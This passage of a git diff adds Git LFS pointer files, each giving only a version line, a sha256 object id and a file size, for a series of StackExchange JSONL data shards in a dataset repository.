sha256:2911cacda57610add190b59874005daa2031aa7a1ef4d70029912047f08369ad +size 35764093 diff --git a/data/stackexchange/1-1/77_2289.jsonl b/data/stackexchange/1-1/77_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8fb53c3302094733f34997d1c80b975bec4a2648 --- /dev/null +++ b/data/stackexchange/1-1/77_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5f13d5d8898d3cd95972f473ece5ee855006ef4f75ecef8caceb21283680a285 +size 38885884 diff --git a/data/stackexchange/1-1/780_2289.jsonl b/data/stackexchange/1-1/780_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4bd46b7348ca584bdccba90c8f4571837915d2da --- /dev/null +++ b/data/stackexchange/1-1/780_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:50bc4ed9bc39e081bc8074191146894c58de0475f0f533d661585d6223426a8d +size 36060938 diff --git a/data/stackexchange/1-1/781_2289.jsonl b/data/stackexchange/1-1/781_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..458148579324b4efdd6f4973fddf128b255ccca0 --- /dev/null +++ b/data/stackexchange/1-1/781_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:557f81d0a6729df1f6eb669ade74447826f62a27630f42b0c2fdd8c2c8c41f82 +size 36380015 diff --git a/data/stackexchange/1-1/782_2289.jsonl b/data/stackexchange/1-1/782_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1b87548b36da8417f2c369a5d8b84af55b54b663 --- /dev/null +++ b/data/stackexchange/1-1/782_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a87eb5708da50c4c7c87032fae3c2b9a0618e4f9790e7b46c609fef655ffa3b3 +size 36126033 diff --git a/data/stackexchange/1-1/783_2289.jsonl b/data/stackexchange/1-1/783_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..38980bb6f59b3605bc4f5a09fb7bd8128549b2f7 --- /dev/null +++ b/data/stackexchange/1-1/783_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ae1cb906674368f9e53733c6f631f3ab66a5bbe32b7000e13506abbd39fcb6e6 +size 35397781 diff --git a/data/stackexchange/1-1/784_2289.jsonl b/data/stackexchange/1-1/784_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..255b157b543473518851f54e47a6ddd42666e1c4 --- /dev/null +++ b/data/stackexchange/1-1/784_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4c9faec1347a999d7e905721859f2ee7fb45cc1b8f4e5b3ee9c4aa509182ffe7 +size 36476689 diff --git a/data/stackexchange/1-1/785_2289.jsonl b/data/stackexchange/1-1/785_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ad46695b3c42a15b10def919de3435e5aab54826 --- /dev/null +++ b/data/stackexchange/1-1/785_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:940ac75173f4e564d9454f067d183270e4a67cd2d82bfc899aec1869539d1179 +size 35497830 diff --git a/data/stackexchange/1-1/786_2289.jsonl b/data/stackexchange/1-1/786_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2a91fa35602d897f220a634695be83cc15cb1abe --- /dev/null +++ b/data/stackexchange/1-1/786_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:776ec99d4815acfaf5b759877e47cbc29571bae982c4db37a764f55a9e34cb6b +size 36318329 diff --git a/data/stackexchange/1-1/787_2289.jsonl b/data/stackexchange/1-1/787_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..11b66b88a0f0f173f0b27b06fc997340441fb698 --- /dev/null +++ b/data/stackexchange/1-1/787_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ef516686d7d01106bbb93f77498c60fcacbe0d1036aa0775769c261f611be7eb +size 36209990 diff --git a/data/stackexchange/1-1/788_2289.jsonl b/data/stackexchange/1-1/788_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c4278da04356478761bfd32b5f5830a4b02865ab --- /dev/null +++ b/data/stackexchange/1-1/788_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:137a325c94b10ec2071076ec1fb7da8fbb423444f8aefd49356c7a4f824b3dce +size 36053184 diff --git a/data/stackexchange/1-1/789_2289.jsonl b/data/stackexchange/1-1/789_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7b7efa2bb445189041d5e7c21c77f9cde276df5c --- /dev/null +++ b/data/stackexchange/1-1/789_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:61df854adf910a042393371bc426e97b34ffab14917cdc0dc964c6aa739b54d0 +size 36652452 diff --git a/data/stackexchange/1-1/78_2289.jsonl b/data/stackexchange/1-1/78_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..14039fddbf8286a0cf17ebd3b5e141ca443e4a55 --- /dev/null +++ b/data/stackexchange/1-1/78_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1da0a8f1c44923e9acdb45801ccff759d3c74c27fe5b9f83f53ca6b8d5256348 +size 39690222 diff --git a/data/stackexchange/1-1/790_2289.jsonl b/data/stackexchange/1-1/790_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1dbaf7fd7f41296bc32d50a1dec7a3faefbc38ab --- /dev/null +++ b/data/stackexchange/1-1/790_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:54f91eba17b26afe11241e44a842e8e76a601577bff416e39f715251b2951eb4 +size 36436326 diff --git a/data/stackexchange/1-1/791_2289.jsonl b/data/stackexchange/1-1/791_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4a2380db29290c25a170b3c132eb4706570747ca --- /dev/null +++ b/data/stackexchange/1-1/791_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:85dc1b0aa66f8b166806c915561619850e0c7c43bdc1198aee4fbd740eda76ef +size 35739129 diff --git a/data/stackexchange/1-1/792_2289.jsonl b/data/stackexchange/1-1/792_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..32f03637bcbe693e2615afe0c776d1e29827b710 --- /dev/null +++ b/data/stackexchange/1-1/792_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:964b5c3dd609783adb47b5bad818bb3d286b6984d7c2dfc2393d26c9403f701a +size 36106951 diff --git a/data/stackexchange/1-1/793_2289.jsonl b/data/stackexchange/1-1/793_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bae7ed296bfe74a37b0fcd1e9a6cf92616a50770 --- /dev/null +++ b/data/stackexchange/1-1/793_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5389bdef47f75f19331620c82912eb28eafc49a9a6375ab80ce907be89ea69db +size 36116675 diff --git a/data/stackexchange/1-1/794_2289.jsonl b/data/stackexchange/1-1/794_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8dea5a0d0f97e6e84c781068747d1ce97a83fa69 --- /dev/null +++ b/data/stackexchange/1-1/794_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c18747a916a51c077c9fd8975d9d7a77ab7f14e8662998edede9b174c5e5205b +size 35952385 diff --git a/data/stackexchange/1-1/795_2289.jsonl b/data/stackexchange/1-1/795_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..545d632b1e55e031d2858eee609cc9f7e80c119d --- /dev/null +++ b/data/stackexchange/1-1/795_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7f6c3a46f86c68221106b567007dc228fe0317ebe9befd54d8406facdb29ca97 +size 35968687 diff --git a/data/stackexchange/1-1/796_2289.jsonl b/data/stackexchange/1-1/796_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8e02b5711e410cf484def1b8332932ee5d8334a4 --- /dev/null +++ b/data/stackexchange/1-1/796_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:04d0aeac567d9221f7ca394216d1a1aa94a007167b46e066dfcc561bdd137c7c +size 36139267 diff --git a/data/stackexchange/1-1/797_2289.jsonl b/data/stackexchange/1-1/797_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..08ac7482dd82cab04250a12157d984c1a9bdf863 --- /dev/null +++ b/data/stackexchange/1-1/797_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b9dd5a615f4e601166e007d34d721d8aa86abb305cebdd28f043d70e28ca7d39 +size 35886254 diff --git a/data/stackexchange/1-1/798_2289.jsonl b/data/stackexchange/1-1/798_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..930f7a2d64c93752c9362b5627215af5704637c1 --- /dev/null +++ b/data/stackexchange/1-1/798_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4203e6cc316b9db69ffd18e5b3462676ad51c5d4184e8042d22e5d088fcf8161 +size 36587299 diff --git a/data/stackexchange/1-1/799_2289.jsonl b/data/stackexchange/1-1/799_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9c7b7219d1988d957ec5b8834b43243c2829ba82 --- /dev/null +++ b/data/stackexchange/1-1/799_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:05e2d86cc3c95f75a60bc57865f9817f041084313a807c63cb9be485f842d54c +size 35924758 diff --git a/data/stackexchange/1-1/79_2289.jsonl b/data/stackexchange/1-1/79_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8930869516a9027193382cda954db0567ac03a64 --- /dev/null +++ b/data/stackexchange/1-1/79_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:13f6856df90b11a7a1dce7fc30efee178c23efb0e9d78eb1349badd66fe741cf +size 38889993 diff --git a/data/stackexchange/1-1/7_2289.jsonl b/data/stackexchange/1-1/7_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..218ca049e3d80848463b0b4fd67caf9d03141ed7 --- /dev/null +++ b/data/stackexchange/1-1/7_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:94eeeb8a6d844a92d05935f22a0c5fc95388c932ec47a21680660b386b1759ef +size 35377362 diff --git a/data/stackexchange/1-1/800_2289.jsonl b/data/stackexchange/1-1/800_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fba57ef34f985bda91db3227b7b51b7a75c0804c --- /dev/null +++ b/data/stackexchange/1-1/800_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7284e4d283e5f4b5dffc38b7658cf06e95c49e9ac3d3facffd4a6e3d52240e7 +size 35445237 diff --git a/data/stackexchange/1-1/801_2289.jsonl b/data/stackexchange/1-1/801_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..732075cfce33447755af4dda9cd3620b1fa50c4a --- /dev/null +++ b/data/stackexchange/1-1/801_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c29b061cec24b0f32d16e14f7f06783e7ae466b47c807abba2bc37adec28c7ef +size 35310082 diff --git a/data/stackexchange/1-1/802_2289.jsonl b/data/stackexchange/1-1/802_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b3b4fc433b461cb600a69a291a1d08a559da988c --- /dev/null +++ b/data/stackexchange/1-1/802_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ecb0a262d6b5a497e48d48e98ad52d0d17e156da987318e3412d195954d35641 +size 34970464 diff --git a/data/stackexchange/1-1/803_2289.jsonl b/data/stackexchange/1-1/803_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..74bc175c69a4cc952c2cf9098dc3dac8f045943b --- /dev/null +++ b/data/stackexchange/1-1/803_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:888bc5fa89419e4955c7639684c04218eed4d25878c5225a01d616f97ab0706e +size 34723902 diff --git a/data/stackexchange/1-1/804_2289.jsonl b/data/stackexchange/1-1/804_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..52406835474183693f078ec37173f2b08074c847 --- /dev/null +++ b/data/stackexchange/1-1/804_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c1fedde0d483fc83bdfae91bb162ec1ff85a039786590de50aa1bef6beb5f3a0 +size 34889510 diff --git a/data/stackexchange/1-1/805_2289.jsonl b/data/stackexchange/1-1/805_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8431be74cebd437cc6b2fc6a057bc42f2437ad72 --- /dev/null +++ b/data/stackexchange/1-1/805_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:732139b60cbf0c314a45059afec9ae47bd6f40e4c9cbbeb95f40884b1d9f327e +size 35181076 diff --git a/data/stackexchange/1-1/806_2289.jsonl b/data/stackexchange/1-1/806_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cd196416c6dce40ddf78dd28043837a4f4a6c4b4 --- /dev/null +++ b/data/stackexchange/1-1/806_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ffdf399b5162a326ce530858b289933ec70ef163a47b278bf6818b43f3ed5a54 +size 35746839 diff --git a/data/stackexchange/1-1/807_2289.jsonl b/data/stackexchange/1-1/807_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d3c3ccdaa3f68772dd3981a397097ac7ea05d971 --- /dev/null +++ b/data/stackexchange/1-1/807_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:80d7188525886f0229fb651e77f230fe0560a7a2ef67a475ac280d9badd7afba +size 34944674 diff --git a/data/stackexchange/1-1/808_2289.jsonl b/data/stackexchange/1-1/808_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e0e9451886bb4ae5de7ebee08bf0144223f67862 --- /dev/null +++ b/data/stackexchange/1-1/808_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bdbe1ad147ec72369da3757e94499904254f10209fe13bc96fa85e7cdd7d5cd0 +size 35070594 diff --git a/data/stackexchange/1-1/809_2289.jsonl b/data/stackexchange/1-1/809_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d8eac3566eb4f6e07350b2faa5b1c988b9d53d2f --- /dev/null +++ b/data/stackexchange/1-1/809_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93893ae6b275dcc30fbb86f714f1d7abf7aa275d3efb5f774451356c83f1c9eb +size 34757492 diff --git a/data/stackexchange/1-1/80_2289.jsonl b/data/stackexchange/1-1/80_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..002842afedcd9db97d9f8e9acdb6d8a413c6bc66 --- /dev/null +++ b/data/stackexchange/1-1/80_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6bd81ec16e520a58ff7dda58305c279ce9ef334ac719f42b62cd470d3cc3263b +size 39346501 diff --git a/data/stackexchange/1-1/810_2289.jsonl b/data/stackexchange/1-1/810_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a12f07519500641181549e2acd31ec4a0687e54e --- /dev/null +++ b/data/stackexchange/1-1/810_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:485ed01b05d0eb562e02f8c6f6023d8bb446727413fdf16529b080de86f89e6e +size 35029122 diff --git a/data/stackexchange/1-1/811_2289.jsonl b/data/stackexchange/1-1/811_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bfdef3cec1b1f5ea9854b1e4ccbf04123d303db3 --- /dev/null +++ b/data/stackexchange/1-1/811_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2dfa67e0d0635d86b6e36153cd5f397cbec0d8e8600c96b1ce06988fa835ca4a +size 36109169 diff --git a/data/stackexchange/1-1/812_2289.jsonl b/data/stackexchange/1-1/812_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..00dd998b17a5700271c778955a381df60981daf4 --- /dev/null +++ b/data/stackexchange/1-1/812_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5c511e1b0115f2d2c15c5746725115389ef72edcb83ebf6748e300cd209bf9da +size 34633685 diff --git a/data/stackexchange/1-1/813_2289.jsonl b/data/stackexchange/1-1/813_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3a297183c9497bd5847e9dbf35b94fa9a97d7722 --- /dev/null +++ b/data/stackexchange/1-1/813_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:215c2f76467d7cc78d0bbaa2b44da11aadcd64e99ccf405a2fddf569e861d101 +size 35148712 diff --git a/data/stackexchange/1-1/814_2289.jsonl b/data/stackexchange/1-1/814_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aa776ce00c7e2e5c4b264f35f150f1f83b11d968 --- /dev/null +++ b/data/stackexchange/1-1/814_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:56e16323590c82a682013d3efbc335c6911cf209fe1098aafac124367e1b59e7 +size 35458502 diff --git a/data/stackexchange/1-1/815_2289.jsonl b/data/stackexchange/1-1/815_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2da765648add26c5c0628c5cf744932c6bc308bb --- /dev/null +++ b/data/stackexchange/1-1/815_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:67708211aea6dbfbcee6cbd19d81831431af4ae2d6828d928977858150f6f5ab +size 34998876 diff --git a/data/stackexchange/1-1/816_2289.jsonl b/data/stackexchange/1-1/816_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2f661823d310044a95370f13fd345339f90d6fd6 --- /dev/null +++ b/data/stackexchange/1-1/816_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d97cdaf9c2697432c64112a4964627fead4f58c89d0a2ea25d9dded12342fe9a +size 34916028 diff --git a/data/stackexchange/1-1/817_2289.jsonl b/data/stackexchange/1-1/817_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..127e9ec0c2e57ef1259e5aa4f62d726b8f96a303 --- /dev/null +++ b/data/stackexchange/1-1/817_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e4351ada95532cd0def32301b7e565078681e294f9580e5305ef378b5ef0b374 +size 35025139 diff --git a/data/stackexchange/1-1/818_2289.jsonl b/data/stackexchange/1-1/818_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2799ccbbe4e14c87de3f96afb87b36fcb6476cb5 --- /dev/null +++ b/data/stackexchange/1-1/818_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7e725f342e196a2b1431d0dbeb6845728b640777bad6e667ffd993073ff90db2 +size 35019498 diff --git a/data/stackexchange/1-1/819_2289.jsonl b/data/stackexchange/1-1/819_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..58a29bca44d44aa3901e884b27c07c62c10ee8db --- /dev/null +++ b/data/stackexchange/1-1/819_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:427d75e680f60ede3306663ceaf7cd5b987e91cb9483dad6daafe4421daf5bc2 +size 35621233 diff --git a/data/stackexchange/1-1/81_2289.jsonl b/data/stackexchange/1-1/81_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2e4996c12f628ed92ca47a199adce6d4a6b1d8ca --- /dev/null +++ b/data/stackexchange/1-1/81_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1a7ade7e05950c1a5559c0b780da010bd1a52cb8b64e11cb7eea0f8307051330 +size 39884274 diff --git a/data/stackexchange/1-1/820_2289.jsonl b/data/stackexchange/1-1/820_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6317b5bd1a596ca34b8372adc9372831bfedac11 --- /dev/null +++ b/data/stackexchange/1-1/820_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6fe6cb12d6ee214a34d21652a527a2cfbf6c00a86f846f1553cb3e4becff30f3 +size 34798521 diff --git a/data/stackexchange/1-1/821_2289.jsonl b/data/stackexchange/1-1/821_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9631e04c05abe5a26ed90adc832dc7a103845590 --- /dev/null +++ b/data/stackexchange/1-1/821_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:52f941e6755d59de2b18a46bbb8ed4c5644f108d26b3c7119b9a4050779004a0 +size 35396635 diff --git a/data/stackexchange/1-1/822_2289.jsonl b/data/stackexchange/1-1/822_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..311f90b5a0acadcf4f9cdc888b0c63b6b7bb0773 --- /dev/null +++ b/data/stackexchange/1-1/822_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a614e42d8be97920706537beb1ec63215d82c16918e7a543001d27721fe76dc5 +size 34836287 diff --git a/data/stackexchange/1-1/823_2289.jsonl b/data/stackexchange/1-1/823_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..62d0b6c10fd1f9493e233823d1e5533a26d2c0bd --- /dev/null +++ b/data/stackexchange/1-1/823_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:707ce882d2014f1f8b1264427210507ac082b1978d6d0e4f83416605123bd980 +size 34864547 diff --git a/data/stackexchange/1-1/824_2289.jsonl b/data/stackexchange/1-1/824_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8c97520c1a81c4346e454b582846f6f08d4d3934 --- /dev/null +++ b/data/stackexchange/1-1/824_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a49015c5a4266eaf6eca21c180f18dafea657c2537436420d364cadcb4a844ba +size 35452670 diff --git a/data/stackexchange/1-1/825_2289.jsonl b/data/stackexchange/1-1/825_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..970651cafbfaddbe1a9d141e4f08f565f8144fc3 --- /dev/null +++ b/data/stackexchange/1-1/825_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c067d283f0cc30c66a510ec7489e84a1d864701c4fcb527f5159dfaaf1002fd3 +size 34855803 diff --git a/data/stackexchange/1-1/826_2289.jsonl b/data/stackexchange/1-1/826_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..179ae2e11f5140efdf62fdf8e11055d2f64cf7a2 --- /dev/null +++ b/data/stackexchange/1-1/826_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c95a0b9657b28de4a2312f8ece46e317b0760c86b3125ab72c1af904117ce426 +size 35550560 diff --git a/data/stackexchange/1-1/827_2289.jsonl b/data/stackexchange/1-1/827_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4e88f876dca1e71beeeb1ccaa8de88e71f030373 --- /dev/null +++ b/data/stackexchange/1-1/827_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3c691aa9f1158a0b74571c565a8dc3fe9fedc794a3b0f3bde87cb149141b441c +size 35344992 diff --git a/data/stackexchange/1-1/828_2289.jsonl b/data/stackexchange/1-1/828_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3437fda54b3b4df831bad4d330288c467a86f451 --- /dev/null +++ b/data/stackexchange/1-1/828_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6cbe19396514459db4a12a21b63327325026bc1835080cfaf501d9067ce50b84 +size 35099253 diff --git a/data/stackexchange/1-1/829_2289.jsonl b/data/stackexchange/1-1/829_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9492747bbb2741f62a79c451501398bad48d84b4 --- /dev/null +++ b/data/stackexchange/1-1/829_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:feadfd96255882df6194f24a6adf903c52ab8c80b4cf7d0812a8a21d7fa6a755 +size 35252806 diff --git a/data/stackexchange/1-1/82_2289.jsonl b/data/stackexchange/1-1/82_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9849b82366c38a6cd67104a062b327657d4bbcfa --- /dev/null +++ b/data/stackexchange/1-1/82_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:469d8844471b3ee5ba24513c7063fe16ff2713a2b1909057e886d3f34ebd710c +size 39421746 diff --git a/data/stackexchange/1-1/830_2289.jsonl b/data/stackexchange/1-1/830_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9dca0f3f1190fd7712bfcffb576c9761db51657a --- /dev/null +++ b/data/stackexchange/1-1/830_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:210241706b2a4c6815cedd4a98f9f387236273bb5d33898125540420f7accb39 +size 34856021 diff --git a/data/stackexchange/1-1/831_2289.jsonl b/data/stackexchange/1-1/831_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..93388158398e2fa234fc7426120d91ac41a4a32f --- /dev/null +++ b/data/stackexchange/1-1/831_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ab0fb029490183721f2daa659b24105e960b8d8f7189462d9a457a92bca34779 +size 35355304 diff --git a/data/stackexchange/1-1/832_2289.jsonl b/data/stackexchange/1-1/832_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8c41c19c6cfbe56d596a80bc3869a032b9f864ce --- /dev/null +++ b/data/stackexchange/1-1/832_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:585129aa56d50ed7369dea6e50a338277fb997070d364fdb4f34da9b011b875b +size 35018342 diff --git a/data/stackexchange/1-1/833_2289.jsonl b/data/stackexchange/1-1/833_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a017dbe5a69601455caf0d2eb0c9d2a49ff116f0 --- /dev/null +++ b/data/stackexchange/1-1/833_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fee8403e14e16e62ce30c605b02dff041ed09b24419de01e67481a0d3ad2249a +size 34696945 diff --git a/data/stackexchange/1-1/834_2289.jsonl b/data/stackexchange/1-1/834_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f710da2dc1637a63291099ea07bbfcf0275b3b04 --- /dev/null +++ b/data/stackexchange/1-1/834_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bf5b4f608ffb871bd53a01f411e473404e0e871bd48959337f107ab228ee562a +size 35697702 diff --git a/data/stackexchange/1-1/835_2289.jsonl b/data/stackexchange/1-1/835_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c4cdd71c428eface81e44150fb20b73bffae0172 --- /dev/null +++ b/data/stackexchange/1-1/835_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5963aa8e0c0250745eeac56a137d9ecfabc144b17040bbc0fd20cd1d60d32893 +size 34545576 diff --git a/data/stackexchange/1-1/836_2289.jsonl b/data/stackexchange/1-1/836_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..502935cb59af044c6b9f87cd9925dd12673acd07 --- /dev/null +++ b/data/stackexchange/1-1/836_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:554480853f9d1d309919369be2e28a4d73f9929f695ed307cbca1f43acc71a14 +size 35303353 diff --git a/data/stackexchange/1-1/837_2289.jsonl b/data/stackexchange/1-1/837_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0e2a83c22ad2f327e61f420944ea1709d9df2752 --- /dev/null +++ b/data/stackexchange/1-1/837_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d9e6fb45a3356b27997db20b579ba61a388cbe0b471f8f3588103680239d9c10 +size 35488665 diff --git a/data/stackexchange/1-1/838_2289.jsonl b/data/stackexchange/1-1/838_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b25d53791e5fd00577b8f37f935eb550f1aca422 --- /dev/null +++ b/data/stackexchange/1-1/838_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f6366c27a4c8c42b1e5c5ee824e9b2517286c049f5ddfd072dfdc283720b42c4 +size 34864072 diff --git a/data/stackexchange/1-1/839_2289.jsonl 